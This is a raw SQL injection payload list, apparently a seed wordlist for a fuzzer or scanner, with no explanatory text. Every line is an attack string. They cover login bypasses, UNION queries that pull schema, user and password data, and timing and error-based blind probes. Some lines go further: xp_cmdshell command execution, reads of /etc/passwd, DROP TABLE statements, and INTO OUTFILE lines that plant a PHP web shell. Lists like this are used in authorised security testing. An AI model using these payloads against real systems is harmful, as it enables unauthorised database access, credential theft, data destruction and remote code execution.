# SQL Injection Seed Payloads
' OR '1'='1
' OR 1=1--
' OR 1=1#
" OR 1=1--
' OR '1'='1'--
' OR 1=1-- -
' OR 1=1/**/
1' OR '1'='1
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
1' ORDER BY 1--
' AND 1=1--
' AND 1=2--
'; DROP TABLE users--
' OR '1'='1' /*
' OR '1'='1' -- -
' WAITFOR DELAY '0:0:5'--
1' AND SLEEP(5)--
' AND 1=0 UNION SELECT 1,2,3--
' HAVING 1=1--
' GROUP BY 1--
' AND 1=1 AND '%'='
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
" OR ""="
" OR 1=1--
1" OR "1"="1
' OR 1 IN (SELECT 1)--
' OR EXISTS(SELECT 1)--
' OR NOT EXISTS(SELECT 1)--
' OR 1=1 INTO OUTFILE '/tmp/test.txt'--
' OR 1=1 INTO DUMPFILE '/tmp/test.txt'--
') OR ('1'='1
')) OR ((1=1
'))); DROP TABLE users;--
1' OR '1'='1' --
1' OR '1'='1' #
1' OR '1'='1'/*
1' OR '1'='1'-- -
1' OR '1'='1'%00
' OR 1=1 LIMIT 1--
' OR 1=1 ORDER BY 1--
' OR 1=1 GROUP BY 1--
' UNION SELECT 1 FROM users--
' UNION SELECT 1,2 FROM users--
' UNION SELECT 1,2,3 FROM users--
' UNION SELECT 1,2,3,4 FROM users--
1' AND 1=0 UNION SELECT 1,2,3--
1' AND 1=0 UNION SELECT 1,2,3,4--
1' AND 1=0 UNION SELECT 1,2,3,4,5--
1' AND 1=0 UNION SELECT NULL--
1' AND 1=0 UNION SELECT NULL,NULL--
1' AND 1=0 UNION SELECT NULL,NULL,NULL--
' AND JSON_EXTRACT('[1]', '$[0]')=1--
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT 1)))--
' AND UPDATEXML(1, CONCAT(0x7e, (SELECT 1)), 1)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND SLEEP(5) AND 'a'='a
' AND BENCHMARK(5000000, MD5('test'))--
' OR '1'='1' AND SLEEP(5)--
' UNION SELECT @@version--
' UNION SELECT @@hostname--
' UNION SELECT @@datadir--
' UNION SELECT user(), version(), database()--
' UNION SELECT table_name, column_name, 1 FROM information_schema.columns--
' UNION SELECT group_concat(table_name), 2, 3 FROM information_schema.tables--
' AND 1=1 UNION SELECT 1,group_concat(password),3 FROM users--
'; EXEC xp_cmdshell('whoami')--
'; EXEC xp_cmdshell('dir')--
' OR 1=1; EXEC xp_cmdshell('net user')--
1' OR 1=1; EXEC xp_cmdshell('whoami')--
' OR 1=1 UNION SELECT 1,@@version,3--
' AND 1=1 IF @@rowcount > 0 WAITFOR DELAY '0:0:5'--
' AND 1=2 IF @@rowcount > 0 WAITFOR DELAY '0:0:5'--
1' AND 1=(SELECT COUNT(*) FROM sysobjects WHERE xtype='U')--
1' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--
' UNION SELECT 1,2,3 FROM mysql.user--
' UNION SELECT 1,group_concat(schema_name),3 FROM information_schema.schemata--
' UNION SELECT 1,group_concat(concat(table_schema,'.',table_name)),3 FROM information_schema.tables--
1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT version()), FLOOR(RAND()*2)) a FROM information_schema.tables GROUP BY a) b)--
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database())))--
' AND UPDATEXML(1, CONCAT(0x7e, (SELECT @@version)), 1)--
1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='
' UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3--
' UNION SELECT 1, LOAD_FILE(0x2f6574632f706173737764), 3--
1' AND 1=0 UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3--
' INTO OUTFILE '/tmp/out.txt' FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n'--
' INTO DUMPFILE '/tmp/out.txt'--
' OR '1'='1' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY '<?php system($_GET[\"cmd\"]); ?>'--
1' OR '1'='1' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY '<?php system($_GET[\"cmd\"]); ?>'--
' UNION SELECT NULL, NULL, NULL, NULL, NULL--
' UNION SELECT 1,2,3,4,5,6--
' AND 1=0 UNION SELECT 1,2,3,4,5,6,7--
' OR 1=1 CONVERT(INT, 'test')--
' OR 1=1 CONVERT(INT, @@SERVERNAME)--
' OR 1 IN (SELECT TOP 1 name FROM sysobjects WHERE xtype='U')--
' OR 1 IN (SELECT TOP 1 name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='users'))--
' AND 1=0 UNION ALL SELECT 1,2,3--
' AND 1=0 UNION ALL SELECT NULL, NULL, NULL--
); SELECT 1 FROM dual--
1' OR '1'='1' ORDER BY 1--
1' OR '1'='1' ORDER BY 2--
1' OR '1'='1' ORDER BY 3--
1' OR '1'='1' ORDER BY 4--
1' OR '1'='1' ORDER BY 5--
1' OR '1'='1' ORDER BY 6--
1' OR '1'='1' ORDER BY 7--
1' OR '1'='1' ORDER BY 8--
1' OR '1'='1' ORDER BY 9--
1' OR '1'='1' ORDER BY 10--
1' OR '1'='1' GROUP BY 1--
1' OR '1'='1' GROUP BY 1,2--
1' OR '1'='1' GROUP BY 1,2,3--
' AND 1=2 UNION SELECT 1, @@version, 3--'
' UNI/**/ON SELECT 1, @@version--'
' UNI/**/ON SELECT 1,2,@@version--'
' SElEcT 1,2,3--'
' AnD 1=1--
' oR 1=1--
1' AnD 1=0 UnIoN SeLeCT 1,2,3--
' AnD 1=0 UnIoN SeLeCT 1,2,3--
1' AnD 1=0 UNION ALL SELECT 1,2,3,4--
'/**/OR/**/1=1--
1'/**/OR/**/'1'='1
1'||'1'='1
'||1=1||'
1' AND 1=0 UNION SELECT ('1'),'2','3'--
1' AND 1=0 UNION SELECT (SELECT group_concat(table_name) FROM information_schema.tables),2,3--
1' AND 1=0 UNION SELECT (SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name=0x7573657273),2,3--
' AND 1=0 UNION SELECT (SELECT group_concat(0x7e, CONCAT(user,':',password), 0x7e) FROM mysql.user),2,3--
' AND (SELECT 1 FROM pg_sleep(5))--
' OR (SELECT 1 FROM pg_sleep(5))--
1' AND (SELECT 1 FROM pg_sleep(10))--
1' OR (SELECT 1 FROM pg_sleep(10))--
' UNION SELECT NULL, NULL, NULL, NULL--
' AND 1=1 UNION SELECT NULL, NULL, NULL, NULL--
' AND 1=2 UNION SELECT NULL, NULL, NULL, NULL--
1' AND 1=1 UNION SELECT NULL, NULL, NULL, NULL--
1' AND 1=2 UNION SELECT NULL, NULL, NULL, NULL--
' UNION SELECT '1', '2', '3'--
' UNION SELECT 1, @@version, 3--
' UNION SELECT 1, database(), 3--
' UNION SELECT 1, user(), 3--
' UNION SELECT 1, @@hostname, 3--
' UNION SELECT 1, @@tmpdir, 3--
' UNION SELECT 1, @@basedir, 3--
' UNION SELECT 1, @@datadir, 3--
' UNION SELECT 1, @@plugin_dir, 3--
